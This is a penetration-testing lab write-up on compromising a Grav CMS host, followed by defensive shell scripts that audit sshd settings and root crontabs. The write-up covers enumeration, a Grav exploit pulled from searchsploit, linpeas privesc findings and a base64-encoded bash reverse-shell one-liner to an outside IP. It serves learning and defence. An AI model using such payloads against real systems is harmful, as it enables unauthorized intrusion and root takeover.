## Enum

- 80/HTTP - website
- 22/SSH

I think I know what to do here :-))

### 80/HTTP - Grav

http://192.168.188.12/grav-admin/

![[Pasted image 20250424125559.png]]

From the site docs: fully flat-file website using PHP.

We run [[FFUF]] for directory enumeration:

- http://192.168.188.12/grav-admin/login
- http://192.168.188.12/grav-admin/admin

Default creds?

- None apparent from docs

There seem to be a couple of CVEs for the system. Question is: which version are we dealing with?

- wappalyzer is not specific
- page source doesn't seem to reveal much
- based on the grav docs there's a limited range of versions:
  - `v1.7`
  - `v1.6`
  - `v1.5`
- I've attempted to enumerate/fingerprint the CMS version in the following ways:
  - `404` page
  - Source code inspection
  - Headers inspection
  - Looking for copyright years
  - And prolly some more shit
- Only thing I could have done further is pull images from the site and inspect EXIF dates, but that would have been too time consuming in an exam.

There's a single CVE which does not require auth:

```
╭─[λ]-[noctua.konstantinovitz.com]-[/targets/astronaut]-[192.168.188.12]
╰─> searchsploit "grav cms"
----------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                         |  Path
----------------------------------------------------------------------- ---------------------------------
Grav CMS 1.4.2 Admin Plugin - Cross-Site Scripting                     | php/webapps/42131.txt
Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Si | php/webapps/49264.txt
Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated | php/webapps/49961.py
GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2)     | php/webapps/49973.py
GravCMS 1.10.7 - Unauthenticated Arbitrary File Write (Metasploit)     | php/webapps/49788.rb
gravy media CMS 1.07 - Multiple Vulnerabilities                        | php/webapps/8315.txt
----------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

╭─[λ]-[noctua.konstantinovitz.com]-[/targets/astronaut]-[192.168.188.12]
╰─> searchsploit -m 49973
  Exploit: GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2)
      URL: https://www.exploit-db.com/exploits/49973
     Path: /opt/exploitdb/exploits/php/webapps/49973.py
    Codes: N/A
 Verified: True
File Type: ASCII text, with very long lines (429)
Copied to: /targets/astronaut/49973.py
```

We generate a payload:

```sh
echo -ne "/bin/bash -i >& /dev/tcp/192.168.45.231/445 0>&1" | base64 -w0
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNDUuMjMxLzQ0NSAwPiYx
```

At this point I got stuck, lost patience and looked at a hint. Apparently I was doing it right and just had to wait a minute...

Totally random that it was this CVE that turned out to work; I had no idea which version of "Grav" I was even dealing with...

## Privesc

Linpeas reveals that the system has a 95% privesc vector: `CVE-2021-3560`, which is Polkit?
https://github.blog/security/vulnerability-research/privilege-escalation-polkit-root-on-linux-with-bug/

We also notice that `/etc/sshd_config` has:

```
PermitRootLogin Yes
PasswordAuthentication Yes
```

We also uncover this entry:

```
╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
-rw-rw-r-- 1 root www-data 47 Apr 24 13:34 status.yaml
total 4
```

```
/var/www/html/grav-admin/user/data/scheduler/status.yaml
```

Contains nothing of interest, but may be chained for some shit later.

```
══╣ Possible private SSH keys were found!
/etc/ImageMagick-6/mime.xml
```

```
-rwxrwxr-- 1 www-data www-data 2161 Mar 17 2021 /var/www/html/grav-admin/webserver-configs/web.config
```

```
╔══════════╣ Users with console
alex:x:1000:1000::/home/alex:/bin/bash
root:x:0:0:root:/root:/bin/bash
```

Another 95% privesc vector:

```
╔══════════╣ Cron jobs
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs
/usr/bin/crontab
* * * * * cd /var/www/html/grav-admin;/usr/bin/php bin/grav scheduler 1>> /dev/null 2>&1
```

## Lessons Learned

...
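The `sshd_config` finding in the Privesc section (`PermitRootLogin` and `PasswordAuthentication` both on) is what turns a leaked or guessed root password into a direct login over 22/SSH. As an added example, not code from these notes, here is a small POSIX shell audit that pulls the effective value of each directive and flags the weak one next to its hardened counterpart. Both sample configs are constructed; `effective_sshd_value` and `audit_sshd_config` are names chosen here, and only the plain `Keyword value` form is handled (no `Match` blocks).

```shell
#!/bin/sh
# Added example, not part of the original notes: audit an sshd_config for the
# two directives linpeas flagged on this box. Only the plain "Keyword value"
# form is handled (no Match blocks, no "Keyword=value"); the first occurrence
# of a keyword wins, as in sshd_config(5).

# Print the effective value of a directive (case-insensitive), nothing if unset.
effective_sshd_value() {
    _key=$(printf '%s' "$2" | tr 'A-Z' 'a-z')
    awk -v key="$_key" '
        /^[ \t]*#/ { next }                               # comment line
        NF >= 2 && tolower($1) == key { print $2; exit }  # first match wins
    ' "$1"
}

# Print one WEAK: line per bad directive. Returns 1 if anything weak was found.
audit_sshd_config() {
    _rc=0
    _prl=$(effective_sshd_value "$1" PermitRootLogin | tr 'A-Z' 'a-z')
    case "$_prl" in
        no) ;;
        "") echo "WEAK: PermitRootLogin unset (default prohibit-password still allows key-based root login)"; _rc=1 ;;
        *)  echo "WEAK: PermitRootLogin $_prl"; _rc=1 ;;
    esac
    _pwa=$(effective_sshd_value "$1" PasswordAuthentication | tr 'A-Z' 'a-z')
    case "$_pwa" in
        no) ;;
        "") echo "WEAK: PasswordAuthentication unset (default yes)"; _rc=1 ;;
        *)  echo "WEAK: PasswordAuthentication $_pwa"; _rc=1 ;;
    esac
    return $_rc
}

# Constructed sample configs: the first mirrors what linpeas showed on the box,
# the second is the hardened counterpart (key-only auth, no root login).
WEAK_CFG=$(mktemp)
HARD_CFG=$(mktemp)
cat > "$WEAK_CFG" <<'EOF'
# constructed: settings found on the target
Port 22
PermitRootLogin Yes
PasswordAuthentication Yes
EOF
cat > "$HARD_CFG" <<'EOF'
# constructed: hardened counterpart
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
EOF

for f in "$WEAK_CFG" "$HARD_CFG"; do
    if audit_sshd_config "$f"; then
        echo "$f: OK"
    else
        echo "$f: weak settings present"
    fi
done
```

Run it against `/etc/ssh/sshd_config` on a real host; an unset `PermitRootLogin` is reported too, because the OpenSSH default (`prohibit-password`) still lets root in with a key.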
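The cron entry in the Privesc section is the real lesson of this box: root runs `php bin/grav scheduler` every minute from the Grav install directory, which the www-data web user can write to (the unauthenticated YAML write used above shows as much), so anything that can write inside the web root also controls what root executes. As an added example, not the notes' own code, here is a shell audit that resolves the paths a root crontab command would use and flags any that a non-root user can modify. The demo tree and crontab are constructed under a temp directory, with the running user standing in for root (a real audit passes `root root`); `cron_cmd_paths`, `path_writable_by_others` and `audit_crontab` are names chosen here.

```shell
#!/bin/sh
# Added example, not part of the original notes: audit a root crontab for
# commands that touch paths a non-root user can modify. On this box root ran
# `cd /var/www/html/grav-admin;/usr/bin/php bin/grav scheduler` every minute
# inside a tree writable by www-data, so whoever writes there controls root.
# Limitations: crontab(5) user-file format only (no @reboot lines), no quoting,
# no paths containing whitespace.

# Print the filesystem paths a cron command line would touch, one per line.
# `cd DIR` segments are followed so later relative paths resolve against DIR;
# flags, redirections and names that do not exist on disk are skipped.
cron_cmd_paths() (
    set -f                        # no glob expansion while splitting tokens (subshell-local)
    cwd="/"
    printf '%s\n' "$1" | sed 's/&&/;/g' | tr ';' '\n' | while IFS= read -r seg; do
        set -- $seg
        if [ $# -eq 0 ]; then continue; fi
        if [ "$1" = "cd" ]; then
            cwd="${2:-/}"
            if [ -e "$cwd" ]; then printf '%s\n' "$cwd"; fi
            continue
        fi
        skip=0
        for tok in "$@"; do
            if [ "$skip" = 1 ]; then skip=0; continue; fi
            case "$tok" in
                *'>'|*'<')           skip=1; continue ;;   # "1>>" / "<": target is the next token
                -*|*'>'*|*'<'*|'&'*) continue ;;           # flags, "2>&1", ">/dev/null", "&"
            esac
            case "$tok" in
                /*) p="$tok" ;;
                *)  p="$cwd/$tok" ;;
            esac
            if [ -e "$p" ]; then printf '%s\n' "$p"; fi
        done
    done
)

# True (exit 0) when PATH ($1) can be modified by someone other than OWNER ($2):
# owned by another user, world-writable, or group-writable by a group other than GROUP ($3).
path_writable_by_others() {
    [ -e "$1" ] || return 1
    [ -n "$(find "$1" -prune \( ! -user "$2" -o -perm -002 -o \( -perm -020 ! -group "$3" \) \) -print 2>/dev/null)" ]
}

# Walk a crontab file (5 schedule fields, then the command) and report every
# path OWNER's jobs would use that others can modify. Returns 1 if any was found.
audit_crontab() {
    found=0
    while IFS= read -r line; do
        case "$line" in ''|'#'*) continue ;; esac          # blank or comment
        case "${line%% *}" in *=*) continue ;; esac         # NAME=value environment line
        cmd=$(printf '%s\n' "$line" | awk '{ $1=$2=$3=$4=$5=""; sub(/^ +/, ""); print }')
        for p in $(cron_cmd_paths "$cmd"); do
            if path_writable_by_others "$p" "$2" "$3"; then
                printf 'RISKY: %s\n  -> %s\n' "$cmd" "$p"
                found=1
            fi
        done
    done < "$1"
    return $found
}

# Constructed demo tree standing in for the target. The running user plays
# root, so "writable by www-data" is modelled with world-writable bits; on the
# real box the `! -user root` rule would fire on the www-data-owned files.
DEMO=$(mktemp -d)
OWNER=$(id -un); GROUP=$(id -gn)
mkdir -p "$DEMO/var/www/html/grav-admin/bin" "$DEMO/usr/bin" "$DEMO/usr/local/sbin"
printf '#!/bin/sh\n' > "$DEMO/var/www/html/grav-admin/bin/grav"
printf '#!/bin/sh\n' > "$DEMO/usr/bin/php"
printf '#!/bin/sh\n' > "$DEMO/usr/local/sbin/backup.sh"
chmod 0777 "$DEMO/var/www/html/grav-admin"          # web root the web user can write to
chmod 0666 "$DEMO/var/www/html/grav-admin/bin/grav" # the script root executes
chmod 0755 "$DEMO/usr/bin/php" "$DEMO/usr/local/sbin/backup.sh"

CRONTAB="$DEMO/root.crontab"
cat > "$CRONTAB" <<EOF
# constructed: mirrors the root crontab linpeas found, rooted under $DEMO
SHELL=/bin/sh
* * * * * cd $DEMO/var/www/html/grav-admin;$DEMO/usr/bin/php bin/grav scheduler 1>> /dev/null 2>&1
0 3 * * * $DEMO/usr/local/sbin/backup.sh --quiet
EOF

if audit_crontab "$CRONTAB" "$OWNER" "$GROUP"; then
    echo "crontab OK"
else
    echo "fix: root-owned, non-writable paths for root jobs, or run the scheduler as www-data"
fi
```

The fix the audit points at is either side of the boundary: run the Grav scheduler as the web user instead of root, or keep root's jobs on paths root alone can write. Any `RISKY:` line is a full root compromise for whoever owns the flagged path, which is exactly the chain this box expects.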